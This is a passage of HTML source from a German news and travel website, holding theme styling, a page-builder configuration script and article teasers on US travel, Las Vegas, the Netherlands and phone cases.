  1973.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T10:51:42+02:00" >Mai 2, 2024</time></span>                                                                                                        </span>
  1974.                                                    </div>
  1975.                    
  1976.                    <div class="td-excerpt">Carmel-by-the-Sea, oft einfach als Carmel bekannt, ist ein malerisches...</div>
  1977.                    
  1978.                                    </div>
  1979.            </div>
  1980.        </div>
  1981.  
  1982.        
  1983.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1984.            <div class="td-module-container td-category-pos-above">
  1985.                                    <div class="td-image-container">
  1986.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" class="td-image-wrap " title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-1-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  1987.                
  1988.                <div class="td-module-meta-info">
  1989.                                        
  1990.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/mietwagen-in-den-usa/" rel="bookmark" title="Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung">Mietwagen in den USA: Ein umfassender Ratgeber für Ihre Buchung</a></h3>
  1991.                    
  1992.                                            <div class="td-editor-date">
  1993.                                                        
  1994.                                                            <span class="td-author-date">
  1995.                                    <a href="https://nachrichtenmorgen.de/author/paul/" aria-label="author-photo" class="td-author-photo"><img alt='Team Nachrichtenmorgen.de' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Team Nachrichtenmorgen.de' src='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/305e9660b5257525bc83aebb3c42e256?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/paul/">Team Nachrichtenmorgen.de</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T09:51:40+02:00" >Mai 2, 2024</time></span>                                                                                                        </span>
  1996.                                                    </div>
  1997.                    
  1998.                    <div class="td-excerpt">Ein Roadtrip durch die USA mit dem Mietwagen –...</div>
  1999.                    
  2000.                                    </div>
  2001.            </div>
  2002.        </div>
  2003.  
  2004.        </div></div><div class="td_block_wrap td_flex_block_1 tdi_167 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_167" >
  2005. <style>.tdi_167{margin-bottom:0px!important}</style>
  2006. <style>.tdi_167 .td-image-wrap{padding-bottom:70%}.tdi_167 .entry-thumb{background-position:center 50%}.tdi_167 .td-image-container{flex:0 0 30%;width:30%;display:block;order:0;margin-left:0;margin-right:auto}.ie10 .tdi_167 .td-image-container,.ie11 .tdi_167 .td-image-container{flex:0 0 auto}.tdi_167 .td-module-container{flex-direction:row;border-color:#eaeaea!important}.ie10 .tdi_167 .td-module-meta-info,.ie11 .tdi_167 .td-module-meta-info{flex:1}body .tdi_167 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_167 .td-module-meta-info{padding:0 0 0 16px;display:flex;flex-direction:column;justify-content:center;border-color:#eaeaea}.tdi_167 .td-category-pos-above .td-post-category{align-self:flex-start;align-self:flex-start!important}.tdi_167 .td_module_wrap{width:25%;float:left;padding-left:10px;padding-right:10px;padding-bottom:10px;margin-bottom:10px}.rtl .tdi_167 .td_module_wrap{float:right}.tdi_167 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_167 .td-module-container:before{bottom:-10px;border-color:#eaeaea}.tdi_167 .td-post-vid-time{display:block}.tdi_167 .td-post-category{margin:0px;padding:0px;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_167 .td-post-category:not(.td-post-extra-category){display:none}.tdi_167 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_167 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_167 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_167 .td-read-more{display:none}.tdi_167 .td-author-date{display:inline}.tdi_167 .td-post-author-name{display:none}.tdi_167 .td-post-date,.tdi_167 .td-post-author-name span{display:none}.tdi_167 .entry-review-stars{display:inline-block}.tdi_167 .td-icon-star,.tdi_167 .td-icon-star-empty,.tdi_167 .td-icon-star-half{font-size:15px}.tdi_167 .td-module-comments{display:none}.tdi_167 .td_module_wrap:nth-child(4n+1){clear:both}.tdi_167 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0;padding-bottom:0}.tdi_167 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none}.tdi_167 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#000000}.tdi_167 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_167 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_167 .td-module-meta-info,.tdi_167 .td-next-prev-wrap{text-align:left}.tdi_167 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_167 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_167 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_167 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_167 .entry-title{margin:0px;font-family:PT Serif!important;font-size:14px!important;line-height:1.4!important;font-weight:600!important}.tdi_167 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_167 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}html:not([class*='ie']) .tdi_167 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_167 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_167 .td-image-wrap{padding-bottom:90%}.tdi_167 .td-module-meta-info{padding:0 0 0 12px}.tdi_167 .td_module_wrap{padding-left:5px;padding-right:5px;padding-bottom:7.5px;margin-bottom:7.5px;clear:none!important;padding-bottom:7.5px!important;margin-bottom:7.5px!important}.tdi_167 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_167 .td-module-container:before{bottom:-7.5px}.tdi_167 .td_module_wrap:nth-child(4n+1){clear:both!important}.tdi_167 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}.tdi_167 .td_module_wrap .td-module-container:before{display:block!important}.tdi_167 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none!important}.tdi_167 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_167 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_167 .entry-title{font-size:12px!important;line-height:1.3!important}.tdi_167 .td-post-category{font-size:10px!important}@media (min-width:768px){.tdi_167 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_167 .td-module-meta-info{padding:0 15px}.tdi_167 .td_module_wrap{width:50%;float:left;padding-left:5px;padding-right:5px;padding-bottom:5px;margin-bottom:5px;clear:none!important;padding-bottom:5px!important;margin-bottom:5px!important}.rtl .tdi_167 .td_module_wrap{float:right}.tdi_167 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_167 .td-module-container:before{bottom:-5px}.tdi_167 .td_module_wrap:nth-child(2n+1){clear:both!important}.tdi_167 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_167 .td_module_wrap .td-module-container:before{display:block!important}.tdi_167 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_167 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_167 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_167 .td-post-category{font-size:11px!important}@media (min-width:768px){.tdi_167 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_167 .td-module-meta-info{max-width:100%}.tdi_167 .td_module_wrap{width:100%;float:left;padding-left:0px;padding-right:0px;padding-bottom:10px;margin-bottom:10px;padding-bottom:10px!important;margin-bottom:10px!important}.rtl .tdi_167 .td_module_wrap{float:right}.tdi_167 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_167 .td-module-container:before{bottom:-10px}.tdi_167 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_167 .td_module_wrap .td-module-container:before{display:block!important}.tdi_167 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_167 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_167 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_167 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_167 = new tdBlock();
  2007. block_tdi_167.id = "tdi_167";
  2008. block_tdi_167.atts = '{"modules_on_row":"eyJhbGwiOiIyNSUiLCJwb3J0cmFpdCI6IjUwJSIsInBob25lIjoiMTAwJSJ9","limit":"8","modules_category":"","show_btn":"none","show_excerpt":"none","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiIxNCIsImxhbmRzY2FwZSI6IjEyIn0=","f_title_font_line_height":"eyJhbGwiOiIxLjQiLCJsYW5kc2NhcGUiOiIxLjMifQ==","show_cat":"none","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIwIDAgMCAxNnB4IiwibGFuZHNjYXBlIjoiMCAwIDAgMTJweCIsInBvcnRyYWl0IjoiMCAxNXB4In0=","modules_divider":"","image_size":"","meta_info_align":"center","image_floated":"float_left","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZSI6eyJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2N30=","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"eyJhbGwiOiI3MCIsImxhbmRzY2FwZSI6IjkwIn0=","all_modules_space":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCJ9","art_excerpt":"0","art_title":"eyJhbGwiOiIwIiwibGFuZHNjYXBlIjoiMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"none","show_author":"none","mc1_el":"10","f_title_font_family":"456","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#ec3535","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","modules_category_padding":"eyJhbGwiOiIwIiwicG9ydHJhaXQiOiIwIiwibGFuZHNjYXBlIjoiMCJ9","f_cat_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjEwIiwicG9ydHJhaXQiOiIxMSJ9","f_cat_font_line_height":"1","modules_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjEwIiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_category_margin":"eyJhbGwiOiIwIiwicG9ydHJhaXQiOiIwIiwibGFuZHNjYXBlIjoiMCJ9","modules_cat_border":"0","f_cat_font_spacing":"-0.5","cat_txt_hover":"#000000","image_width":"30","offset":"4","category_ids":"","excl_padd":"3px 5px","excl_margin":"-4px 5px 0 0","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_radius":"2","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","show_review":"inline-block","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_family":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":3,"header_color":"","color_preset":"","border_top":"","class":"tdi_167","tdc_css_class":"tdi_167","tdc_css_class_style":"tdi_167_rand_style"}';
  2009. block_tdi_167.td_column_number = "3";
  2010. block_tdi_167.block_type = "td_flex_block_1";
  2011. block_tdi_167.post_count = "8";
  2012. block_tdi_167.found_posts = "3784";
  2013. block_tdi_167.header_color = "";
  2014. block_tdi_167.ajax_pagination_infinite_stop = "";
  2015. block_tdi_167.max_num_pages = "473";
  2016. tdBlocksArray.push(block_tdi_167);
  2017. </script><div class="td-block-title-wrap"></div><div id=tdi_167 class="td_block_inner td-mc1-wrap">
  2018.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2019.            <div class="td-module-container td-category-pos-">
  2020.                                    <div class="td-image-container">
  2021.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" class="td-image-wrap " title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-7-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2022.                
  2023.                <div class="td-module-meta-info">
  2024.                                        
  2025.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-kalifornien/" rel="bookmark" title="Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer">Die schönsten Sehenswürdigkeiten in Kalifornien: Ein unvergessliches Abenteuer</a></h3>
  2026.                    
  2027.                    
  2028.                    
  2029.                    
  2030.                                    </div>
  2031.            </div>
  2032.        </div>
  2033.  
  2034.        
  2035.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2036.            <div class="td-module-container td-category-pos-">
  2037.                                    <div class="td-image-container">
  2038.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/" rel="bookmark" class="td-image-wrap " title="Die besten Hotels in Las Vegas: Eine umfassende Anleitung"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-8-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2039.                
  2040.                <div class="td-module-meta-info">
  2041.                                        
  2042.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/hotels-in-las-vegas/" rel="bookmark" title="Die besten Hotels in Las Vegas: Eine umfassende Anleitung">Die besten Hotels in Las Vegas: Eine umfassende Anleitung</a></h3>
  2043.                    
  2044.                    
  2045.                    
  2046.                    
  2047.                                    </div>
  2048.            </div>
  2049.        </div>
  2050.  
  2051.        
  2052.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2053.            <div class="td-module-container td-category-pos-">
  2054.                                    <div class="td-image-container">
  2055.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/" rel="bookmark" class="td-image-wrap " title="Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-9-1-696x391.jpg"  ></span></a></div>                                                                    </div>
  2056.                
  2057.                <div class="td-module-meta-info">
  2058.                                        
  2059.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/internationale-fuehrerschein-fuer-die-usa/" rel="bookmark" title="Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer">Der internationale Führerschein für die USA: Ein unverzichtbares Dokument für deutsche Autofahrer</a></h3>
  2060.                    
  2061.                    
  2062.                    
  2063.                    
  2064.                                    </div>
  2065.            </div>
  2066.        </div>
  2067.  
  2068.        
  2069.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2070.            <div class="td-module-container td-category-pos-">
  2071.                                    <div class="td-image-container">
  2072.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/koenigstag-in-den-niederlanden/" rel="bookmark" class="td-image-wrap " title="Königstag in den Niederlanden: Ein lebendiges Fest in Orange"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-15-696x391.jpg"  ></span></a></div>                                                                    </div>
  2073.                
  2074.                <div class="td-module-meta-info">
  2075.                                        
  2076.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/koenigstag-in-den-niederlanden/" rel="bookmark" title="Königstag in den Niederlanden: Ein lebendiges Fest in Orange">Königstag in den Niederlanden: Ein lebendiges Fest in Orange</a></h3>
  2077.                    
  2078.                    
  2079.                    
  2080.                    
  2081.                                    </div>
  2082.            </div>
  2083.        </div>
  2084.  
  2085.        
  2086.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2087.            <div class="td-module-container td-category-pos-">
  2088.                                    <div class="td-image-container">
  2089.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/ein-umfassender-leitfaden-zur-maskenpflicht-und-corona-regeln-fuer-reisende-in-die-niederlande/" rel="bookmark" class="td-image-wrap " title="Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-16-696x391.jpg"  ></span></a></div>                                                                    </div>
  2090.                
  2091.                <div class="td-module-meta-info">
  2092.                                        
  2093.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/ein-umfassender-leitfaden-zur-maskenpflicht-und-corona-regeln-fuer-reisende-in-die-niederlande/" rel="bookmark" title="Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande">Ein umfassender Leitfaden zur Maskenpflicht und Corona-Regeln für Reisende in die Niederlande</a></h3>
  2094.                    
  2095.                    
  2096.                    
  2097.                    
  2098.                                    </div>
  2099.            </div>
  2100.        </div>
  2101.  
  2102.        
  2103.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2104.            <div class="td-module-container td-category-pos-">
  2105.                                    <div class="td-image-container">
  2106.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/usa-reise-2024/" rel="bookmark" class="td-image-wrap " title="USA-Reise 2024: Kosten im Überblick für einen günstigen Urlaub in Kalifornien"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-17-696x391.jpg"  ></span></a></div>                                                                    </div>
  2107.                
  2108.                <div class="td-module-meta-info">
  2109.                                        
  2110.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/usa-reise-2024/" rel="bookmark" title="USA-Reise 2024: Kosten im Überblick für einen günstigen Urlaub in Kalifornien">USA-Reise 2024: Kosten im Überblick für einen günstigen Urlaub in Kalifornien</a></h3>
  2111.                    
  2112.                    
  2113.                    
  2114.                    
  2115.                                    </div>
  2116.            </div>
  2117.        </div>
  2118.  
  2119.        
  2120.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2121.            <div class="td-module-container td-category-pos-">
  2122.                                    <div class="td-image-container">
  2123.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/heiraten-in-las-vegas/"  rel="bookmark" class="td-image-wrap " title="Heiraten in Las Vegas: Blitzhochzeiten und Romantische Hochzeitspakete" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-18-696x391.jpg"  ></span></a></div>                                                                    </div>
  2124.                
  2125.                <div class="td-module-meta-info">
  2126.                                        
  2127.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/heiraten-in-las-vegas/"  rel="bookmark" title="Heiraten in Las Vegas: Blitzhochzeiten und Romantische Hochzeitspakete">Heiraten in Las Vegas: Blitzhochzeiten und Romantische Hochzeitspakete</a></h3>
  2128.                    
  2129.                    
  2130.                    
  2131.                    
  2132.                                    </div>
  2133.            </div>
  2134.        </div>
  2135.  
  2136.        
  2137.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2138.            <div class="td-module-container td-category-pos-">
  2139.                                    <div class="td-image-container">
  2140.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-zukunft-der-handyhuellen/"  rel="bookmark" class="td-image-wrap " title="Die Zukunft der Handyhüllen: innovative Materialien und Funktionen" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Die-Zukunft-der-Handyhuellen-innovative-Materialien-und-Funktionen-696x398.jpg"  ></span></a></div>                                                                    </div>
  2141.                
  2142.                <div class="td-module-meta-info">
  2143.                                        
